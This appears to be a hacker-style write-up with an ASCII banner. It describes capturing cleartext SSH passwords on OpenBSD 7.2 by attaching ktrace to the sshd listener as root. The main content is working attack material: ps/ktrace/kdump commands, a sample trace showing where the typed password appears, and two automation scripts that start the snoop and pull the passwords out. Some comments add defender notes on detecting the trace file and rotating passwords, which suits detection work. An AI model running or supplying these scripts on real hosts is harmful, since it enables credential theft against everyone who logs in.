____ ____ __ __
/\ _`\ /\ _`\ /\ \/\ \ __
\ \,\L\_\ \,\L\_\ \ \_\ \ ____ ___ ___ ___ _____ /\_\ ___ __
\/_\__ \\/_\__ \\ \ _ \ /',__\ /' _ `\ / __`\ / __`\/\ '__`\/\ \ /' _ `\ /'_ `\
/\ \L\ \/\ \L\ \ \ \ \ \ /\__, `\/\ \/\ \/\ \L\ \/\ \L\ \ \ \L\ \ \ \/\ \/\ \/\ \L\ \
\ `\____\ `\____\ \_\ \_\ \/\____/\ \_\ \_\ \____/\ \____/\ \ ,__/\ \_\ \_\ \_\ \____ \
\/_____/\/_____/\/_/\/_/ \/___/ \/_/\/_/\/___/ \/___/ \ \ \/ \/_/\/_/\/_/\/___L\ \
\ \_\ /\____/
\/_/ \_/__/
-------------------------------------
SSH password snooping on OpenBSD 7.2
-------------------------------------
# First get the parent PID of the SSHD
openbsd72# ps -aux | grep ssh | grep -v grep
root 17831 0.0 0.0 1100 1176 ?? I 1:06PM 0:00.14 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups (sshd)
root 42012 0.0 0.1 1172 3568 ?? I 1:06PM 0:00.51 sshd: user [priv] (sshd)
user 73361 0.1 0.1 1672 3456 ?? S 1:06PM 0:25.17 sshd: user@ttyp0 (sshd)
openbsd72#
In this case it will be the PID 17831
# Then start ktrace on that PID and trace all of its I/O
ktrace -idg 17831
rm ktrace.out < ! This is important, otherwise it will just keep growing and fill up the disk >
ktrace -ti -p 17831
# It will produce a ktrace.out file in the current working directory
# Then test and SSH to the box from outside using some dummy wrong password
# I have used a dummy password "FUCKTHIS"
# Read the text from the ktrace.out via kdump
kdump -f ktrace.out
# The cleartext password supplied to the SSHD appears in a few places, but the most
reliable one I could see is just above the NAMI "/usr/libexec/auth/login_passwd" filename lookup call
43482 sshd RET write 1
13409 sshd CALL dup2(8,3)
13409 sshd RET dup2 3
43482 sshd CALL write(5,0x1f15487218,0x9)
43482 sshd GIO fd 5 wrote 9 bytes
"FUCKTHIS\0"
43482 sshd RET write 9
13409 sshd CALL closefrom(4)
43482 sshd CALL read(5,0x1ef4282068,0x2000)
13409 sshd RET closefrom 0
13409 sshd CALL execve(0x7ffffe3da0,0x7ffffe3a08,0x1f2a1f2210)
13409 sshd NAMI "/usr/libexec/auth/login_passwd"
13409 sshd ARGS
[0] = "passwd"
[1] = "-s"
[2] = "response"
[3] = "--"
[4] = "user"
[5] = "staff"
13409 login_passwd NAMI "/usr/libexec/ld.so"
# To stop all ktrace dumping, run
ktrace -C
# To automate all of the above, here are two simple scripts
# START-SNOOP-SSH.sh
#
# Attaches kernel tracing (ktrace) to the running sshd listener so that the
# I/O of sshd and its children is written to ./ktrace.out. Requires root on
# the host: this is a post-compromise technique, not a network attack, so the
# controls that matter are host integrity (root access) and not sending
# reusable passwords over SSH at all (public-key auth).
#
# Defender notes:
#  - ktrace.out is created in the invoker's working directory and grows with
#    every connection (the README warns it can fill the disk); an unexpected,
#    growing ktrace.out on a server is a strong indicator.
#  - The file holds cleartext credentials of everyone who logs in while the
#    trace is active; treat any recovered copy as a credential-exposure event
#    and rotate the affected passwords.
#  - `ktrace -C` (see the README above) disables all tracing on the system.
echo " /----------------------------/"
echo " / OpenBSD OpenSSH SNOOPER / "
echo "/----------------------------/ "
echo "started to dump SSHD process"
# Picks the ps line containing /usr/sbin/sshd, i.e. the [listener] process
# shown in the README's ps output, and takes its PID (column 2).
sshpid=$(ps -aux | grep "\/usr\/sbin\/sshd" | awk '{print $2}')
# -i: future children inherit tracing; -d: trace existing descendants;
# -g: the argument is treated as a process group ID.
ktrace -idg $sshpid
# Start from an empty trace file (an old one would otherwise be appended to).
rm -f ktrace.out
# -t i: restrict tracing to I/O records; -p: the listener PID.
ktrace -ti -p $sshpid
echo ""
echo "Now wait for somebody to SSH to this machine with a password"
----------------------------------------------------------
# READ-SNOOP-SSH.sh
#
# Decodes ktrace.out with kdump into a scratch file named TEXT in the current
# directory, prints the lines surrounding the login_passwd lookup with the
# record-type lines (GIO/RET/CALL/ARGS/NAMI and argv entries [0]-[3]) filtered
# out, then deletes TEXT. What remains is the GIO payload line — the password
# typed by the user, as shown in the README excerpt — and the [4]/[5] argv
# entries (user name and login class).
#
# Defender notes: both ktrace.out and TEXT contain cleartext credentials on
# disk; TEXT is removed with rm -f but ktrace.out is left in place. Finding
# either file, or kdump/ktrace activity against sshd in process accounting,
# should be treated as evidence of credential theft on the host.
kdump -f ktrace.out > TEXT
grep -A 6 -B 8 -R "NAMI \"\/usr\/libexec\/auth\/login_passwd\"" TEXT |grep -v GIO | grep -v RET | grep -v CALL | grep -v ARGS | grep -v NAMI | grep -v "\[0\]" | grep -v "\[1\]" | grep -v "\[3\]" | grep -v "\[2\]"
rm -f TEXT
----------------------------------------------------------